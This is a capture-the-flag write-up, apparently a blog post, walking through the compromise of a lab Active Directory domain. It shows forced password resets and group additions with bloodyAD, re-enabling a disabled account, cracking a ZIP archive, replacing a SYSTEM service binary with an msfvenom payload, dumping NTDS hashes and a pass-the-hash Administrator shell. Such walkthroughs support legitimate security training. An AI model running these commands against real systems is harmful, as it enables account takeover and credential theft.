DN : CN=Domain Users,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Cert Publishers [top | group]
DN : CN=Cert Publishers,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Domain Computers [top | group]
DN : CN=Domain Computers,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH AddMember
Target : Remote Desktop Users [top | group]
DN : CN=Remote Desktop Users,CN=Builtin,DC=404finance,DC=local
Rights : AddMember
Technique : Add any principal to the target group
Methods : add-member
Attack : Add yourself to Domain Admins or any privileged group.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : bf9679c0-0de6-11d0-a285-00aa003049e2
🟠 HIGH WriteUserAccountControl
Target : Guest [top | person | organizationalperson | user]
DN : CN=Guest,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Users [top | container]
DN : CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
════════════════════════════════════════════════════════════════════════════════
From the output, we observe that robert has ForceChangePassword privileges over the following three accounts:
melanie.kunzjan.tresornina.inkasso
And also he can add user to Remote Desktop Users group to rdp.
Initially, I attempted to perform an ASREPRoasting attack against the webadmin and svc.services accounts. However, I was unable to crack the retrieved hashes. Consequently, I leveraged the ForceChangePassword privilege to reset the credentials of these accounts and authenticate as them. It is unclear whether other attack paths exist for this scenario.
1
2
3
4
5
6
7
8
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' set password melanie.kunz 'Password@123'
[+] Password changed successfully!
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' set password jan.tresor 'Password@123'
[+] Password changed successfully!
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' set password nina.inkasso 'Password@123'
[+] Password changed successfully!
In order to gain RDP access to these accounts, we need to add each account to the Remote Desktop Users group using robert privileges.
1
2
3
4
5
6
7
8
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' add groupMember 'Remote Desktop Users' melanie.kunz
[+] melanie.kunz added to Remote Desktop Users
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' add groupMember 'Remote Desktop Users' jan.tresor
[+] jan.tresor added to Remote Desktop Users
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' add groupMember 'Remote Desktop Users' nina.inkasso
[+] nina.inkasso added to Remote Desktop Users
I RDP on all three accounts and enumerated their file systems.
No sensitive information was found on the melanie.kunz and nina.inkasso accounts.
However, on the jan.tresor account, I discovered deleted emails in the Recycle Bin, one of which contained credentials for Daniel Hoffmann.
Additionally, this email revealed that the svc.services account had been disabled by Robert Graef.
Since we have write privileges over this account via robert.graef, we can reenable it.
Cheking …
1
2
3
> nxc smb 10.1.60.192 -u daniel.hoffmann -p 'Rem*************'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\daniel.hoffmann:Rem**************
At this point, we have successfully gained access to the
daniel.hoffmannaccount using the credentials recovered from the deleted email found in theRecycle Binofjan.tresordesktop.
Jump to webadmin
Again, a quick scan for dangerous ACL misconfigurations that daniel has over the domain objects.
The output reveals that daniel.hoffmann has ForceChangePassword privileges over the webadmin account.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
> python3 aclhug.py --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' -t daniel.hoffmann
AD ACL Hunter
Time : 2026-06-22 18:19:24 EDT
User : robert.graef
Domain : 404finance.local
DC IP : 10.1.60.192
Base DN : DC=404FINANCE,DC=LOCAL
[*] Connecting...
[+] Connection established
[*] Resolving 'daniel.hoffmann'...
[+] SID : S-1-5-21-2956725473-317782918-2795636496-1109
[+] DN : CN=Daniel Hoffmann,CN=Users,DC=404finance,DC=local
[+] Type : User
[*] Paged ACL scan (page_size=500)...
[*] Scanning 255 objects for SID S-1-5-21-2956725473-317782918-2795636496-1109...
[████████████████████] 100% (255/255)
════════════════════════════════════════════════════════════════════════════════
🎯 ACL Results › daniel.hoffmann [user]
Summary: 🟠 HIGH: 1
🟠 HIGH ForceChangePassword
Target : webadmin [top | person | organizationalperson | user]
DN : CN=Alex Meier,CN=Users,DC=404finance,DC=local
Rights : ForceChangePassword
Technique : Password Reset (no current password required)
Methods : force-change-password
Attack : Reset the target's password to anything — immediate account
takeover.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 00299570-246d-11d0-a768-00aa006e0529
════════════════════════════════════════════════════════════════════════════════
Our next step is to reset the webadmin account password using daniel.hoffmann ForceChangePassword privilege, then leverage robert.graef group membership rights to add webadmin to the Remote Desktop Users group. Finally, we will establish an RDP session as webadmin and enumerate the file system.
1
2
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u daniel.hoffmann -p 'Rem**************' set password webadmin 'Password@123'
[+] Password changed successfully!
1
2
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' add groupMember 'Remote Desktop Users' webadmin
[+] webadmin added to Remote Desktop Users
Jump to svc.services
While enumerating the webadmin file system, I discovered the IIS root directory located at C:\inetpub.
Inside, I identified two web application folders corresponding to services running on port 80 and port 5000 respectively.
The port 80 application appeared standard, however, the port 5000 application was of particular interest.
Revisiting the home page encountered during the initial reconnaissance phase, the description of Alex Meier the web administrator, states:
Upon enumerating the port 5000 directory, a ZIP archive was discovered.
Next, we will transfer the ZIP archive to our attack machine and attempt to crack it, as it was found to be password protected upon extraction attempts on the target machine.
Attempts to crack the archive using the rockyou wordlist were unsuccessful.
Subsequently, I generated a custom wordlist from the web application using cewl, which successfully recovered the password.
1
> zip2john config_backup.zip > hash
1
> cewl http://10.1.60.192/ > passlist
1
2
3
4
5
6
7
8
9
10
> john hash --wordlist=passlist
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 131 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
D*************** (config_backup.zip/config.dat)
1g 0:00:00:00 DONE (2026-06-22 18:55) 12.50g/s 6375p/s 6375c/s 6375C/s CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)..One
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Upon extracting the ZIP archive, a file named config.dat was discovered, containing credentials for the svc.services account.
1
2
3
4
5
6
7
> cat config.dat
# Configuration Backup - Do not delete!
[ServiceUser]
username = svc.services
password = S3***************
host = WIN-SRV01
autostart = true
It is worth recalling that, as noted from the previously discovered email, the
svc.servicesaccount is currentlydisabled. Therefore, we must first reenable the account, then add it to theRemote Desktop Usersgroup, and finally we can establish anRDP session.
Verifying the current userAccountControl attribute of svc.services.
As observed, the ACCOUNTDISABLE flag is set on the svc.services account, indicating that it is currently disabled.
Therefore, we must remove this flag to reenable the account.
1
2
3
4
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' get object svc.services --attr userAccountControl
distinguishedName: CN=Service Account,CN=Users,DC=404finance,DC=local
userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
The following table outlines the most commonly referenced userAccountControl flags.
| Property Flag | Hexadecimal Value | Decimal Value | Description |
|---|---|---|---|
| SCRIPT | 0x0001 |
1 | The logon script will be run. |
| ACCOUNTDISABLE | 0x0002 |
2 | The user account is disabled. |
| HOMEDIR_REQUIRED | 0x0008 |
8 | The home folder is required. |
| LOCKOUT | 0x0010 |
16 | The account is locked. |
| PASSWD_NOTREQD | 0x0020 |
32 | No password is required. |
| PASSWD_CANT_CHANGE | 0x0040 |
64 | The user can’t change the password. |
| ENCRYPTED_TEXT_PWD_ALLOWED | 0x0080 |
128 | The user can send an encrypted password. |
| TEMP_DUPLICATE_ACCOUNT | 0x0100 |
256 | An account for users whose primary account is in another domain. |
| NORMAL_ACCOUNT | 0x0200 |
512 | Default account type representing a typical user. |
| INTERDOMAIN_TRUST_ACCOUNT | 0x0800 |
2048 | Trust account for a system domain that trusts other domains. |
| WORKSTATION_TRUST_ACCOUNT | 0x1000 |
4096 | Computer account for a workstation or server that is a member of this domain. |
| SERVER_TRUST_ACCOUNT | 0x2000 |
8192 | Computer account for a domain controller that is a member of this domain. |
| DONT_EXPIRE_PASSWORD | 0x10000 |
65536 | Password should never expire. |
| MNS_LOGON_ACCOUNT | 0x20000 |
131072 | MNS logon account. |
| SMARTCARD_REQUIRED | 0x40000 |
262144 | Forces the user to log on using a smart card. |
| TRUSTED_FOR_DELEGATION | 0x80000 |
524288 | Service account is trusted for Kerberos delegation. |
| NOT_DELEGATED | 0x100000 |
1048576 | User security context is not delegated. |
| USE_DES_KEY_ONLY | 0x200000 |
2097152 | Restrict this principal to DES encryption types. |
| DONT_REQ_PREAUTH | 0x400000 |
4194304 | Account does not require Kerberos pre-authentication. |
| PASSWORD_EXPIRED | 0x800000 |
8388608 | User password has expired. |
| TRUSTED_TO_AUTH_FOR_DELEGATION | 0x1000000 |
16777216 | Account is enabled for delegation (security-sensitive). |
| PARTIAL_SECRETS_ACCOUNT | 0x04000000 |
67108864 | Account is a Read-Only Domain Controller (RODC). |
The svc.services account has the following flags set, with a combined userAccountControl value of 66050:
ACCOUNTDISABLE= 2NORMAL_ACCOUNT= 512DONT_EXPIRE_PASSWORD= 65536
2 + 512 + 65536 = 66050
To reenable the account, the ACCOUNTDISABLE flag must be cleared by subtracting its decimal value from the current userAccountControl value, resulting in a new value of 66048.
1
2
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' set object svc.services userAccountControl -v 66048
[+] svc.services's userAccountControl has been updated
Upon verification, the ACCOUNTDISABLE flag has been successfully cleared from the svc.services account.
1
2
3
4
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' get object svc.services --attr userAccountControl
distinguishedName: CN=Service Account,CN=Users,DC=404finance,DC=local
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
Next, we will add svc.services to the Remote Desktop Users group to establish an RDP session and begin the privilege escalation phase.
1
2
> bloodyAD --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123' add groupMember 'Remote Desktop Users' svc.services
[+] svc.services added to Remote Desktop Users
Checking …
1
2
3
> nxc smb 10.1.60.192 -u svc.services -p 'S3***************'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\svc.services:S3***************'
Pwning Administrator
For this phase, after reviewing other writeups, it was apparent that the common approach involves abusing a misconfigured certificate template for privilege escalation.
However, I independently identified an alternative method, exploiting weak permissions on the svcstats service binary located at C:\Program Files\svcstats.
First, let us enumerate this service by addressing the following questions:
- What privileges does this service run under ?
When standard tools like sc.exe and Get-Service failed to reveal the service, we went directly to the Windows Registry, which stores all service configurations regardless of access restrictions on the Service Control Manager.
1
2
3
PS C:\Users\svc.services> reg query "HKLM\SYSTEM\CurrentControlSet\Services" | findstr /i "svcstat"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svcstats
Next, extracting full fervice details.
1
2
3
4
5
6
7
8
9
10
11
PS C:\Users\svc.services> reg query "HKLM\SYSTEM\CurrentControlSet\Services\svcstats"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svcstats
Type REG_DWORD 0x10
Start REG_DWORD 0x2
ErrorControl REG_DWORD 0x1
ImagePath REG_EXPAND_SZ C:\Program Files\svcstats\svcstats.exe
ObjectName REG_SZ LocalSystem
Description REG_SZ Service Statistics Monitor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svcstats\Security
The important field here is ObjectName = LocalSystem, confirming the service runs as SYSTEM.
Move to next question.
- what permissions our current user
svc.serviceshad over the target binary ?
1
2
3
4
5
6
7
8
9
PS C:\Users\svc.services> icacls "C:\Program Files\svcstats\svcstats.exe"
C:\Program Files\svcstats\svcstats.exe FINANCE404\svc.services:(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
The key finding here is svc.services:(M) the (M) flag stands for Modify, meaning our current user has full write access over this executable.
Our current user cannot replace the service binary, but it has write access to the binary itself !
Start Exploiting …
Since Windows Defender is active on the target, writing a reverse shell payload would be detected immediately. Instead, we can overwrite the binary with a custom executable that adds our current user to the Administrators group.
1
2
3
4
5
6
7
> msfvenom -p windows/x64/exec CMD="net localgroup administrators svc.services /add" -f exe -o svcstats.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 315 bytes
Final size of exe file: 7168 bytes
Saved as: svcstats.exe
Next, we need to transfer the payload to the target machine and overwrite the original service binary with it.
Binary size before:
Overwriting the original service binary.
1
2
PS C:\Users\svc.services> $sourceBytes = [System.IO.File]::ReadAllBytes("C:\Users\svc.services\Desktop\svcstats.exe")
PS C:\Users\svc.services> [System.IO.File]::WriteAllBytes("C:\Program Files\svcstats\svcstats.exe", $sourceBytes)
Binary size after:
The original service binary has been successfully overwritten !
Let us now verify the current privileges of the svc.services user to confirm that they are still at a standard user level.
1
2
3
> nxc smb 10.1.60.192 -u svc.services -p 'S3****************'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\svc.services:S3****************
Upon attempting to start the service, we observe that we have’t permissions to do so.
1
2
3
4
C:\Users\svc.services>sc.exe start svcstats
[SC] StartService: OpenService FAILED 5:
Access is denied.
So, let’s analyzing SDDL to understand Our rights.
1
2
3
C:\Users\svc.services>sc sdshow svcstats
D:(A;;CCLCSWLOCRRC;;;SY)(A;;SWRPWPDTLORC;;;S-1-5-21-2956725473-317782918-2795636496-1112)
Confirming our SID.
1
2
3
4
5
6
7
8
C:\Users\svc.services>whoami /user
USER INFORMATION
----------------
User Name SID
======================= =============================================
finance404\svc.services S-1-5-21-2956725473-317782918-2795636496-1112
Great ! SID matches exactly. Now decoding our permissions.
SW = SERVICE_QUERY_STATUS RP = SERVICE_START
We own
SERVICE_STARTbut whysc startstill failed ?
sc.exe is designed for administrators, so it always requests SERVICE_ALL_ACCESS regardless of the operation even for a simple start.
But .NET ServiceController class invokes OpenService() requesting only the specific access rights required for the operation. For example, when starting a service, it typically requests only SERVICE_START rather than broader permissions such as SERVICE_ALL_ACCESS
1
2
3
4
5
6
7
8
PS C:\Users\svc.services> (New-Object System.ServiceProcess.ServiceController("svcstats")).Start()
Exception calling "Start" with "0" argument(s): "Cannot start service svcstats on computer '.'."
At line:1 char:1
+ (New-Object System.ServiceProcess.ServiceController("svcstats")).Star ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : InvalidOperationException
The exception was thrown during status verification after calling
Start(), not during the start action itself. The service started successfully, butServiceControllercouldn’t read back the newstatedue to insufficient query rights.
When we check again we see that our user has successfully joined the local administrators group !
1
2
3
> nxc smb 10.1.60.192 -u svc.services -p 'S3****************'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\svc.services:S3S3****************' (Pwn3d!)
Dumping NTDS database.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
> nxc smb 10.1.60.192 -u svc.services -p 'S3*************!' --ntds
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\svc.services:S3*************! (Pwn3d!)
SMB 10.1.60.192 445 DC-404 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.1.60.192 445 DC-404 Administrator:500:aa****************************ee:a6****************************92:::
SMB 10.1.60.192 445 DC-404 Guest:501:aa****************************ee:31****************************c0:::
SMB 10.1.60.192 445 DC-404 krbtgt:502:aa****************************ee:90****************************ff:::
SMB 10.1.60.192 445 DC-404 404finance.local\ka************:1103:aa****************************ee:60****************************f6:::
SMB 10.1.60.192 445 DC-404 404finance.local\to********:1104:aa****************************ee:89****************************fd:::
SMB 10.1.60.192 445 DC-404 404finance.local\ro**********:1105:aa****************************ee:a2****************************6b:::
SMB 10.1.60.192 445 DC-404 404finance.local\ni**********:1106:aa****************************ee:a2****************************6b:::
SMB 10.1.60.192 445 DC-404 404finance.local\ja********:1107:aa****************************ee:a2****************************6b:::
SMB 10.1.60.192 445 DC-404 404finance.local\me***********:1108:aa****************************ee:a2****************************6b:::
SMB 10.1.60.192 445 DC-404 404finance.local\da*************:1109:aa****************************ee:3a****************************32:::
SMB 10.1.60.192 445 DC-404 404finance.local\we******:1110:aa****************************ee:a2****************************6b:::
SMB 10.1.60.192 445 DC-404 404finance.local\sv**********:1112:aa****************************ee:dc****************************6c:::
SMB 10.1.60.192 445 DC-404 DC-404$:1000:aa****************************ee:94****************************89:::
SMB 10.1.60.192 445 DC-404 [+] Dumped 13 NTDS hashes
Using Impacket wmiexec to obtain an interactive Administrator shell via the Pass-the-Hash technique.
1
2
3
4
5
6
7
8
> python3 /home/y4t/Desktop/certipy-venv/bin/wmiexec.py 404finance.local/'administrator'@10.1.60.192 -hashes aad3b435b51404eeaad3b435b51404ee:a6019e48da8f602a60c30a6f0136d792
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
finance404\administrator
User Flag
1
2
3
4
5
6
7
8
9
10
11
C:\>dir c:\Users\daniel.hoffmann\Desktop
Volume in drive C has no label.
Volume Serial Number is 2CCF-A8C2
Directory of c:\Users\daniel.hoffmann\Desktop
07/02/2025 11:16 AM <DIR> .
07/02/2025 11:16 AM <DIR> ..
07/02/2025 11:16 AM 1,164 user.txt
1 File(s) 1,164 bytes
2 Dir(s) 35,702,448,128 bytes free
Root Flag
1
2
3
4
5
6
7
8
9
10
11
C:\>dir c:\Users\administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 2CCF-A8C2
Directory of c:\Users\administrator\Desktop
02/05/2026 10:03 AM <DIR> .
02/05/2026 10:03 AM <DIR> ..
07/03/2025 07:17 AM 6,235 root.txt
1 File(s) 6,235 bytes
2 Dir(s) 35,702,448,128 bytes free
This post is licensed under
CC BY 4.0
by the author.